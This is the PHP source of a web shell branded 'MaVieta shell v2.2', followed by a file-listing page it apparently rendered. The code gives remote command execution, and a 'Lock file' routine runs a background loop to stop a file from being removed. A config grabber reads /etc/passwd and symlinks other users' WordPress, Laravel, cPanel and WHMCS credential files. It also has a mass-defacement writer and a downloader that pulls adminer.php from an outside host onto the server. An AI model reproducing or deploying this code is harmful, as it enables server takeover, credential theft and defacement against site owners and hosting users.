    echo "<table class='directory-listing-table'><td>";
    echo '<br><form method="post"><center>
    <div class="input-group" style="width:600px;">
    <span class="input-group-text mb-1">Command :</span>
     <input type="text" class="form-control" name="komen" id="comandnya" value="'.$_POST['komen'].'" placeholder="uname -a" required>
    <button type="submit" name="comandeks" value="execute" class="btn btn-outline-light mb-1">>></button></div></form><br><center>';
    if (isset($_POST['comandeks'])) {
        ekse($_POST['komen'], $serlok);
    }
    echo "</center></td></table><br></center>";
    exit();
} elseif ($_REQUEST[net('about')] == "opet") {
    echo "<table class='directory-listing-table'><thead><td><div style='font-family: Bungee Outline;font-size:24px;'>
    <img class='crot' src='https://i.pinimg.com/564x/84/0e/4c/840e4c57fab2ba6279b377ae8dc333d3.jpg'/> Priv shell uwu edition</div><hr>
    <br> - MaVieta shell v2.2 <br> - Created by MaVieta</td></thead></table>"; exit();
} elseif ($_REQUEST[net('lokfile')] == "opet") {
    echo "<table class='directory-listing-table'><td>
    <h5><i class='fa fa-lock' style='color:#1A9DD2;'></i> Lock file<font class='MaVieta-text' style='font-size:12px;'><i> Linux</i></font></h5><hr style='color:#04FBFF;'>
    <center><form method='post'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' name='pile' class='form-control mb-2' placeholder='file.php'/></div><br>
    <button type='sumbit' class='btn btn-outline-light' style='width:120px;' name='submit'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form><br></td></table>";
    if (isset($_POST['submit'])) {
        if (empty($_POST['pile'])) {
            echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center>The File field is required</center></font></td></table>";
        } else {
        $filez = $_POST['pile'];
        $tempe = "/tmp";
        if (file_exists($tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock') && file_exists($tempe . '/'.MaVieta_ex($filez).'-xopet')) {
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock', $serlok);
            }
            cmd("cp $filez ".$tempe."/".md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            @chmod($filez, 0444);
            $content = '<?php
    $tmp = "/tmp";
    $fileperm = MaVieta_perm("'.$filez.'");
    MaVieta_cmd("chmod 444 '.$filez.'");
    while (True) {
        if (!file_exists("'.$filez.'")) {
            $var = base64_encode(file_get_contents($tmp . "/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock"));
            FiLe_pUt_ConTentS("'.$filez.'", base64_decode($var));
        }
        if ($fileperm != "0444"){
            MaVieta_cmd("chmod 444 '.$filez.'");
        }
    }
    function MaVieta_cmd($value)
    {
        if (function_exists("system")) {
            sYsTem($value);
        } else if (function_exists("shell_exec")) {
            return ShEll_eXeC($value);
        } else if (function_exists("exec")) {
            return ExEc($value);
        } else if (function_exists("passthru")) {
            return pAsSThRu($value);
        }
    }
    function MaVieta_perm($filez){
        return substr(sprintf("%o", fileperms($filez)), -4);
    }';
    $content = file_put_contents($tempe. "/" .md5($serlok. $filez.'-xMaVieta'). MaVieta_ex($filez).'xhand.Lock', $content);
    if ($content) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Locked => <font color='lime'>$filez</font></td></table>";
        cmd('php '. $tempe . '/' .md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'"xhand.Lock" > /dev/null 2>/dev/null &', $serlok);
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't lock $filez</font></td></table>";
            }
        }
    }exit();
} elseif ($_GET[net('resetcp')] == "opet") {
echo "<table class='directory-listing-table'><td>
<h5>Coming Soon</h5><hr></td></table><br>";exit();
} elseif ($_GET[net('hashiden')] == "opet") {
 echo "<table class='directory-listing-table'><td>
<h5>Hash Identifier</h5>Identify and detect unknown hashes using this tool.<hr>
<form method='POST'>
<div class='input-group' style='width:650px;'>
<span class='input-group-text mb-2'>Your hash :</span>
<input type='text' name='hash' class='form-control mb-2' placeholder='write here'></div><br>
<button type='submit' name='submit' class='btn btn-outline-light'>Submit & identify</button>
 <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light'>Back</a></form></td></table><br>";
if (isset($_POST['submit'])) {
    if (empty($_POST['hash'])) {
        echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> The Hashes field is required</font></center></td></table>";
    } else {
function identify($hash) {
$algorithms = [
'<font color="lime">MD5' => '/^[a-f0-9]{32}$/i',
'<font color="lime">SHA1' => '/^[a-f0-9]{40}$/i',
'<font color="lime">SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i',
'<font color="lime">SHA256' => '/^[a-f0-9]{64}$/i',
'<font color="lime">SHA512' => '/^[a-f0-9]{128}$/i',
'<font color="lime">Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/',
'<font color="lime">Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/',
'<font color="lime">Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/'];
    foreach ($algorithms as $name => $pattern) {
        if (preg_match($pattern, $hash)) {
            return $name;
        }
    }
    return '<font color="red">Could not identify / Tidak dapat mengidentifikasi</font>';
}
$hashes = [$_POST['hash']];
echo "<table class='directory-listing-table'><td>";
foreach ($hashes as $hash) {
    echo "
    Hash : <font color='lime'>$hash\n</font>";
    echo "<br> Algorithms : " .identify($hash). "\n\n</font></td></table>";
            }
        }
    } exit();
} elseif ($_GET[net('grab_config')] == "opet") {
@ini_set('max_execution_time',0); 
@ini_set('display_errors', 0); 
@ini_set('file_uploads',1);
echo '<table class="directory-listing-table"><thead><td>
<center>Config Grabber<br><br><form method="POST"><textarea cols="100" name="passwd"  rows="25">'; 
$uSr=file("/etc/passwd"); 
foreach($uSr as $usrr) { 
$str=explode(":",$usrr); echo $str[0]."\n"; } 
echo'</textarea><br>
<input type="hidden" class="input" name="folfig" value="MaVietacfg"/><br>
<select class="form-select form-select-sm" aria-label=".form-select-lg example" style="width:150px;">
<option>select menu</option>
<option title="type txt" value=".txt">.txt</option>
<option title="type php" value=".php">.php</option>
<option title="type shtml" value=".shtml">.shtml</option>
<option title="type ini" value=".ini">.ini</option>
<option title="type html" value=".html">.html</option></select><br>
<input name="conf" style="width:100px;" class="btn btn-outline-light" value="submit" type="submit">
</td></thead></table></form></center><br>';
} if(isset($_POST['conf'])) {
$v = "var";
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]);
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wp1.txt');
@symlink('/home/'.$user.'/htdocs/wp-config.php',$user.'-Wp-htdocs.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wp2.txt');
@symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'-Wp3.txt');
@symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-WpHm1.txt');
@symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-WpHm2.txt');
@symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-WpHm3.txt');
@symlink('/var/www/html/wp-config.php',$v.'-wp1.txt');
@symlink('/home/'.$user.'/public_html/.env',$user.'-Laravel1.txt');
@symlink('/home/'.$user.'/public_html/web/.env',$user.'-Laravel2.txt');
@symlink('/home/'.$user.'/public_html/public/.env',$user.'-Laravel3.txt');
@symlink('/var/www/html/.env',$v.'-LaravelV.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/html/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/web/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-Magento.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter.txt');
@symlink('/home/'.$user.'/public_html/web/application/config/database.php',$user.'-CodeIgniterH.txt');
@symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter1.txt');
@symlink('/home2/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter2.txt');
@symlink('/home3/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter3.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangento.txt');
echo '<table class="directory-listing-table"><thead><td><center>Done => <a href='.$folfig.' target="_blank" class="button">Click Here</a></center></td></thead></table><br>';
    }exit();
} elseif ($_REQUEST[net('scanshell')] == "opet") {
    echo "<center><table class='directory-listing-table'><td>
    <form method='post'>
    <h5><i class='fa-solid fa-newspaper'></i> Backdoors Scanning</font></h5><hr>
    *note : Jika resultnya kosong berarti tidak ditemukan/ekstensi nya di isi dengan benar
    <div class='input-group mb-2' style='width:350px;'>
    <span class='input-group-text mb-1'>Extension :</span>
    <input type='text' class='form-control' name='ext' placeholder='ex : php, phar, shtml, phtml'></div>
    <div class='input-group mb-2' style='width:550px;'>
    <span class='input-group-text mb-1'>Directory :</span>
    <input type='text' class='form-control' name='peth' value='$serlok'></div>
    <button type='submit' class='btn btn-outline-light' name='submit' style='width:120px;'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a>
    </form></td></table><br>";
    if(isset($_POST['submit'])) {
        function scan_directory($dir) {
    $ext = $_POST['ext'];
    $rdi = new RecursiveDirectoryIterator($dir);
    echo "<table class='directory-listing-table'><td>";
    foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) {
        if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) {
            $content = file_get_contents($filename);
            if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) {
                echo "<pre>Found : <font color='lime'>$filename</font> => <font color='orange'>Detected</font> <a href='?viewfile=$filename&path=".$_GET['path']."/$rdi' target='_blank'><i>view</i></a></pre>\n";
            }
        }
    } 
} 
$cek = $_POST['peth'];
if ($cek) {
scan_directory($cek);
echo "<font color='aqua'>Scan Completed..!!</font></td></table><br>";
        } 
    } exit();
} elseif ($_REQUEST[net('massdef')] == "opet") {
    function sabun_massal($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo "[<font color=lime>DONE</font>] $serlok<br>";
                            file_put_contents($lokasi, $isi_script);
                            $idx = sabun_massal($dirc,$namafile,$isi_script);
                        }
                    }
                }
            }
        }
    }
    function sabun_biasa($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo " http://$dirb/$namafile<br>";
                            file_put_contents($lokasi, $isi_script);
                        }
                    }
                }
            }
        }
    }
    if($_POST['start']) {
        if($_POST['tipe_sabun'] == 'mahal') {
            echo "<table class='directory-listing-table'><td>";
            sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        } elseif($_POST['tipe_sabun'] == 'murah') {
            echo "<table class='directory-listing-table'><td>";
            sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        }
    } else {
    echo "<table class='directory-listing-table'><td>";
    echo "<form method='post'>
    <div class='form-check-inline mb-2'>
    <input type='radio' name='tipe_sabun' id='biasa' class='form-check-input' value='murah' checked>
    <label class='form-check-label' for='inlineRadio1'>Biasa</label></div>
    <div class='form-check form-check-inline'>
    <input type='radio' name='tipe_sabun' class='form-check-input' value='mahal'>
    <label class='form-check-label' for='inlineRadio2'>Massal</label></div>
    <div class='input-group' style='width:430px;'>
    <span class='input-group-text mb-1'>Files :</span>
    <input type='text' name='d_file' class='form-control' placeholder='file.html'></div>
    <div class='input-group' style='width:750px;'>
    <span class='input-group-text mb-1'>Path :</span>
    <input type='text' name='d_dir' class='form-control' value='$serlok'></div>
    <textarea name='script' class='form-control' style='width: 750px; height: 300px;' placeholder='Hello Word!'></textarea><br>
    <button type='submit' name='start' value='start' class='btn btn-outline-light' style='width: 300px;'>submit</button> 
    <a href='?path=$serlok&".net('tool')."=opet' class='btn btn-outline-light' style='width: 300px;'>Back</a>
    </form></td></table>";
    }exit();
} elseif ($_REQUEST[net('ner')] == "opet") {
    function crot($url){
        $MaVieta = curl_init($url);
        curl_setopt($MaVieta, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($MaVieta, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($MaVieta, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($MaVieta, CURLOPT_HEADER, 0);
        return curl_exec($MaVieta);
        curl_close($MaVieta);
    } 
        echo "<table class='directory-listing-table'><td><h5><i class='fa fa-database' aria-hidden='true'></i> Adminer<font class='MaVieta-text' style='font-size:12px;'><i> v4.8.1</i></font></h5><hr><center>
    <form method='POST'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' placeholder='adminer.php' class='form-control mb-2' name='miner'></div><br>
        <button type='sumbit' class='btn btn-outline-light' name='gass' style='width:120px;'>Submit</button> 
        <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form></td></table><br>";
    if(isset($_POST['gass'])) {
        if (empty($_POST['miner'])) {
            echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Input field is required<center></font></td></table>";
        } else {
    $check = $serlok."/".$_POST['miner'];
    $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web."",$check);
    $content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php');
    $open = fopen($check, 'w');
    fwrite($open, $content);
    fclose($open);
    if (file_exists($check)) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Adminer<font color='lime'> : $check </font><br>Link : <a href='".$result."' target='_blank'><i>$result</i></a></td></table>";
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create adminer..!!</center></font></td></table>";
                    }
                }
        }exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
    function createfile(){
        $pat = $_GET['path'];
        $nama_file = $_POST['nama_file'];
        $isi_file = $_POST['isi_file'];
        $handle = fopen("$pat/$nama_file", 'w');
        $files = $_GET['path']."/".$nama_file;
        $asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files);
        if (fwrite($handle, $isi_file)) {
            echo '<table class="directory-listing-table" style="border-color:lime;"><td>Created => <font color="lime">'.$pat.'/'.$nama_file.'<br></font>Link : <a href="'.$asu.'" target="_blank"><font color="aqua"><i>Click here</i></a></font></td></table>';
        } else {
            echo '<table class="directory-listing-table" style="border-color:red;"><td><font color=red><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file..!!</font></script></td></table>';
        }
    } if(!isset($_POST['bikin'])) {
        echo "<center><table class='directory-listing-table'><td width='12%''>
    <form method='POST'>
        <input type='text' value='file.php' placeholder='Nama File' style='width: 525px;' name='nama_file' autocomplete='off'><br><br>
        <textarea name='isi_file' rows='20' cols='100' placeholder='Hello World!'></textarea><br>
        <button type='sumbit' class='btn btn-outline-light' style='width:200px; height:36px;' height:30;' name='bikin'>CREATE</button> 
        <a href='?path=".$serlok."' class='btn btn-outline-light'>Back</a><br>
    </form></center>";
        } else {
            createfile();
        }exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
      function createDirectory() {
        if (empty($_POST['add'])) {
        echo '<table class="directory-listing-table" style="border-color:orange;"><td><font color="orange">Folder field is required</font> [<a href="?path='.$_GET['path'].'&'.net("buatfolder").'=opet"><i class="fa-solid fa-folder-plus" aria-hidden="true"></i>Create again</a>]</td></table>';
        } else {
        $add = $_POST["add"];
        $MaVieta = mkdir($_GET['path']."/".$add);
        if ($MaVieta == true) {
            echo "<table class='directory-listing-table' style='border-color:lime;'><td>Created =><font color=lime> ".$_GET['path']."/</font><font color='orange'>$add</font><br>
            <a href='?path=".$_GET['path']."/$add'><u>Click Here</u></a></td></table>";
    } else {
            echo "<table class='directory-listing-table' style='border-color:red;'><td><font color=red><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create folder : $add</font></td></table>";
                }
        }
}
        if (!isset($_POST['submit'])) {
            echo '<table class="directory-listing-table"><td>
        <form action="" method = "POST"><h5><i class="fa fa-folder-plus"></i> Create Folder</h5><hr><center>
        <div style="width:300px;">
         <input type="text" class="form-control" placeholder="Folder Name" name="add" id="add"/><br></div>
        <button type="submit" class="btn btn-outline-light" name="submit" value="Create directory" style="width:120px;">Create</button> 
        <a href="?path='.$serlok.'" class="btn btn-outline-light" style="width:120px;">Back</a><br><br></form></td></table>';
        } else {
            createDirectory();
        }exit();
} elseif ($_REQUEST[net('info')] == "opet") {
    echo "<table class='directory-listing-table' align='center'>
    <div id='content'><tr><td>";
    echo "Server : <font color=orang>".$_SERVER['HTTP_HOST']."</font><br>";
    echo "Server IP : <font color=orange>".ipserv()."</font>  <br> Your IP : <font color=orange>".$_SERVER['REMOTE_ADDR']."</font><br>";
    echo "Web Server : <font color='orange'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
    echo "System : <font color='orange'>".php_uname()."</font><br>";
    echo "User : <font color='orange'>".@get_current_user()." </font>( <font color='orange'>".@getmyuid()."</font>)<br>";
    echo "PHP Version : <font color='orange'>".@phpversion()." </font>=><font color='orange'> ".php_sapi_name()."</font><br>";
    echo "</tr></td><tr><td>Disable Function : ".$disf."</font>";
    echo "</div></tr></td><tr><td>";
    echo "<hr>Orecle : ";
if (function_exists('oci_connect')) {
        echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | SSH2 : ";
}

if (function_exists('ssh2_connect')) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | cURL : ";
if (function_exists("curl_init")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
$pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
    echo " | PKEXEC : $pkexec<br><br>";
    echo "</tr></td></table><br>";
    exit();

}


if (!is_readable($serlok)) {
    die("<table class='directory-listing-table'><thead><td><center><font color=orange>This directory is unreadable :(</font></center></td></thead></table>");
}

echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 20px black;width:90%;border-left:1px solid #40BECC;border-right:1px solid #40BECC;border-bottom:1px solid #40BECC;--bs-border-radius:80rem;" align="center">
<thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"><tr>
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Last Modified</center></th>
<th><center>Owner</center></th>
<th><center>Permissions</center></th>
<th><center>Actions</center></th>
</tr></thead><center>';
$scd = "\163\143"."\141\156\144"."\151\162";
if(is_readable($serlok)){
            $fetch=$scd($serlok);
            $serlokbos=array();
            $filez=array();
            foreach($fetch as $fols){
                if($fols=='.'||$fols=='..'){
                    continue;
                }
                    $MaVietas=$serlok.'/'.$fols;
                    if(is_dir($MaVietas)){
                        array_push($serlokbos,$fols);
                    }elseif(is_file($MaVietas)){
                        array_push($filez,$fols);
                    }
                }
            }
foreach($serlokbos as $dir){
    echo "<tr>
    <td><i class='fa fa-folder' style='color: #FAA625'></i> <a href=\"?path=".$serlok."/".$dir."\">".$dir."</a></td>
    <td><center>Dir</center></td>
    <td><center>".filedate($serlok."/".$dir)."</center></td>
    <td>".owner($serlok."/".$dir)."</td>
    <td><center>";
    if(is_writable($serlok."/".$dir)) echo '<font color="lime">';
    elseif(!is_readable($serlok."/".$dir)) echo '<font color="red">';
    echo statusnya($serlok."/".$dir);
    if(is_writable($serlok."/".$dir) || !is_readable($serlok."/".$dir)) echo '</font>';

    echo "</center></td>
    <td><center><form method=\"POST\" action=\"?pilihan&path=$serlok\">
    <div class='btn-group me-2' role='group' aria-label='First group'>
    <button type='submit' class='btn btn-outline-secondary badge-action-rename' name='pilih' value='gantinama'>
    <i class='fa fa-pencil' style='color: #fff'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmodf'><i class='fa fa-gear' style='color: #06D2D5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdatef'><i class='fa fa-calendar' style='color: #5654F5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #E53A3A'></i></button></div>
    <input type=\"hidden\" name=\"type\" value=\"dir\">
    <input type=\"hidden\" name=\"name\" value=\"$dir\">
    <input type=\"hidden\" name=\"path\" value=\"$serlok/$dir\">
    </form></center></td>
    </tr>";
}

foreach($filez as $file) {
    if(!is_file("$serlok/$file")) continue;
        $size = filesize("$serlok/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
        $size = '<font color="aqua">'.round($size/1024,2).'</font> MB';
    } else {
        $size = '<font color="#E6F01C">'.$size.'</font> KB';
    }
echo "<tr>
<td>".cekfile($serlok."/".$file)."
<a href=\"?viewfile=".$serlok."/$file&path=".$serlok."\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($serlok."/".$file)."</center></td>
<td>".owner($serlok."/".$file)."</td>
<td><center>";
if(is_writable("$serlok/$file")) echo '<font color="lime">';
elseif(!is_readable("$serlok/$file")) echo '<font color="red">';
echo statusnya("$serlok/$file");
if(is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '</font>';
echo "</center></td><td><center>
<form method='post' action='?pilihan&path=$serlok'>
<div class='btn-group' role='group' aria-label='First group'>";
echo gazz($file);
echo "</div><input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$serlok/$file\">
</form></center></td></tr>";
}
echo '</tr></td></table></table>';
author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
</body>
</html>
1#@!#!123s

: usr / share / bash-completion / completions / 

Name
Size
Last Modified
Owner
Permissions
Actions
2to3
0.901 KB
November 16 2021 5:58:12
root
0644
7z
4.197 KB
November 16 2021 5:58:12
root
0644
7za
4.197 KB
November 16 2021 5:58:12
root
0644
_adb
1.74 KB
November 16 2021 5:58:12
root
0644
_cal
0.904 KB
November 16 2021 5:58:12
root
0644
_chfn
0.232 KB
November 16 2021 5:58:12
root
0644
_chsh
0.682 KB
November 16 2021 5:58:12
root
0644
_dmesg
0.907 KB
November 16 2021 5:58:12
root
0644
_eject
0.794 KB
November 16 2021 5:58:12
root
0644
_hexdump
0.661 KB
November 16 2021 5:58:12
root
0644
_hwclock
0.607 KB
November 16 2021 5:58:12
root
0644
_ionice
1.228 KB
November 16 2021 5:58:12
root
0644
_look
0.435 KB
November 16 2021 5:58:12
root
0644
_mock
2.023 KB
November 16 2021 5:58:12
root
0644
_modules
2.479 KB
November 16 2021 5:58:12
root
0644
_mount
2.011 KB
November 16 2021 5:58:12
root
0644
_mount.linux
10.787 KB
November 16 2021 5:58:12
root
0644
_newgrp
0.422 KB
November 16 2021 5:58:12
root
0644
_nmcli
6.033 KB
November 16 2021 5:58:12
root
0644
_renice
0.752 KB
November 16 2021 5:58:12
root
0644
_repomanage
0.592 KB
November 16 2021 5:58:12
root
0644
_reptyr
0.536 KB
November 16 2021 5:58:12
root
0644
_rfkill
0.905 KB
November 16 2021 5:58:12
root
0644
_rtcwake
0.856 KB
November 16 2021 5:58:12
root
0644
_runuser
0.235 KB
November 16 2021 5:58:12
root
0644
_su
0.963 KB
November 16 2021 5:58:12
root
0644
_svn
8.674 KB
November 16 2021 5:58:12
root
0644
_svnadmin
2.254 KB
November 16 2021 5:58:12
root
0644
_svnlook
1.941 KB
November 16 2021 5:58:12
root
0644
_udevadm
2.122 KB
November 16 2021 5:58:12
root
0644
_umount
0.616 KB
November 16 2021 5:58:12
root
0644
_umount.linux
4.506 KB
November 16 2021 5:58:12
root
0644
_write
0.233 KB
November 16 2021 5:58:12
root
0644
_xm
7.549 KB
November 16 2021 5:58:12
root
0644
_yum
4.374 KB
November 16 2021 5:58:12
root
0644
a2disconf
1.437 KB
March 18 2024 7:41:43
root
0644
a2dismod
1.437 KB
March 18 2024 7:41:43
root
0644
a2dissite
1.437 KB
March 18 2024 7:41:43
root
0644
a2enconf
1.437 KB
March 18 2024 7:41:43
root
0644
a2enmod
1.437 KB
March 18 2024 7:41:43
root
0644
a2ensite
1.437 KB
March 18 2024 7:41:43
root
0644
a2x
0.902 KB
November 16 2021 5:58:12
root
0644
abook
1.192 KB
November 16 2021 5:58:12
root
0644
aclocal
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.10
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.11
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.12
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.13
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.14
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.15
0.833 KB
November 16 2021 5:58:12
root
0644
aclocal-1.16
0.833 KB
November 16 2021 5:58:12
root
0644
acpi
0.449 KB
November 16 2021 5:58:12
root
0644
add-apt-repository
2.194 KB
October 24 2023 8:13:11
root
0644
add_members
0.753 KB
November 16 2021 5:58:12
root
0644
addpart
0.473 KB
April 09 2024 11:32:56
root
0644
alias
0.479 KB
November 16 2021 5:58:12
root
0644
alpine
0.878 KB
November 16 2021 5:58:12
root
0644
alternatives
2.401 KB
November 16 2021 5:58:12
root
0644
animate
8.704 KB
November 16 2021 5:58:12
root
0644
ant
2.734 KB
November 16 2021 5:58:12
root
0644
apache2ctl
0.371 KB
November 16 2021 5:58:12
